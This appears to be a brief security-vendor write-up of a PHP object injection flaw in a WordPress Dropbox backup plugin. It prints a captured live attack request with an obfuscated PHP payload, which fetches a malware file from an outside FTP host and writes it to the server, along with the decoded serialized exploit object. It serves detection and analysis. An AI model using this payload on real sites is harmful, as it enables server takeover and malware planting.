WordPress plugin Backup & Restore Dropbox have PHP Object Injection Vulnerability. It’s allow remote download malware to the server.
This vulnerability founded by pluginvulnerabilities.com and published it.
We found that vulnerability try malware download common.php malware to server via FTP Protocol.
Real Post Payload
--5232150d-B-- POST / HTTP/1.1 Accept-Encoding: identity Content-Length: 791 Host: malware.expert User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36 Connection: close Cookie: cmd=echo%208a44d571857dd91b3fca6d302776b2ea; code=%24str%3Dfile_get_coNteNts%28chr%28102%29.chr%28116%29.chr%28112%29.chr%2858%29.chr%2847%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%28121%29.chr%28109%29.chr%28111%29.chr%28117%29.chr%28115%29.chr%2858%29.chr%2849%29.chr%2850%29.chr%2851%29.chr%2864%29.chr%2853%29.chr%2852%29.chr%2846%29.chr%2849%29.chr%2853%29.chr%2851%29.chr%2846%29.chr%2852%29.chr%2854%29.chr%2846%29.chr%2856%29.chr%2853%29.chr%2858%29.chr%2856%29.chr%2848%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%2844%29.chr%2847%29.chr%28116%29.chr%28101%29.chr%28115%29.chr%28116%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%29%3B+file_put_coNteNts%28ABSPATH.chr%2847%29.chr%28119%29.chr%28112%29.chr%2845%29.chr%2899%29.chr%28111%29.chr%28110%29.chr%28116%29.chr%28101%29.chr%28110%29.chr%28116%29.chr%2847%29.chr%2899%29.chr%28111%29.chr%28109%29.chr%28109%29.chr%28111%29.chr%28110%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%2C%24str%29%3B+die%28%29%3B;
First file_get_contents download common.php malware and file_put_contents write it to server.
Content-Type: application/x-www-form-urlencoded --5232150d-C-- dropbox-backup_request=YToyOntzOjY6Im1ldGhvZCI7Tzo4OiJXUF9UaGVtZSI6NDp7czoxNzoiAFdQX1RoZW1lAGhlYWRlcnMiO2E6Mzp7czo0OiJOYW1lIjtzOjExOiIxIG5hbWUgaGVyZSI7czoxMDoiVGV4dERvbWFpbiI7czo1OiJlbl9VUyI7czoxMDoiRG9tYWluUGF0aCI7czoxOiIsIjt9czoyMDoiAFdQX1RoZW1lAHRoZW1lX3Jvb3QiO3M6NToiZnRwOi8iO3M6MjA6IgBXUF9UaGVtZQBzdHlsZXNoZWV0IjtzOjQyOiJhbm9ueW1vdXM6MTIzQDU0LjE1My40Ni44NTo4MC90bXAvdG1wL2Fub24iO3M6NToiY2FjaGUiO2E6MDp7fX1zOjY6InBhcmFtcyI7Tzo4OiJXUF9UaGVtZSI6NDp7czoxNzoiAFdQX1RoZW1lAGhlYWRlcnMiO2E6Mzp7czo0OiJOYW1lIjtzOjExOiIxIG5hbWUgaGVyZSI7czoxMDoiVGV4dERvbWFpbiI7czo1OiJlbl9VUyI7czoxMDoiRG9tYWluUGF0aCI7czoxOiIsIjt9czoyMDoiAFdQX1RoZW1lAHRoZW1lX3Jvb3QiO3M6NToiZnRwOi8iO3M6MjA6IgBXUF9UaGVtZQBzdHlsZXNoZWV0IjtzOjQyOiJhbm9ueW1vdXM6MTIzQDU0LjE1My40Ni44NTo4MC90bXAvdG1wL2Fub24iO3M6NToiY2FjaGUiO2E6MDp7fX19
dropbox-backup_request decoded
Array
(
[method] => __PHP_Incomplete_Class Object
(
[__PHP_Incomplete_Class_Name] => WP_Theme
[headers:WP_Theme:private] => Array
(
[Name] => 1 name here
[TextDomain] => en_US
[DomainPath] => ,
)
[theme_root:WP_Theme:private] => ftp:/
[stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
[cache] => Array
(
)
)
[params] => __PHP_Incomplete_Class Object
(
[__PHP_Incomplete_Class_Name] => WP_Theme
[headers:WP_Theme:private] => Array
(
[Name] => 1 name here
[TextDomain] => en_US
[DomainPath] => ,
)
[theme_root:WP_Theme:private] => ftp:/
[stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
[cache] => Array
(
)
)
)
Use Malware Expert Signatures to detect this malware from PHP files and clean them up.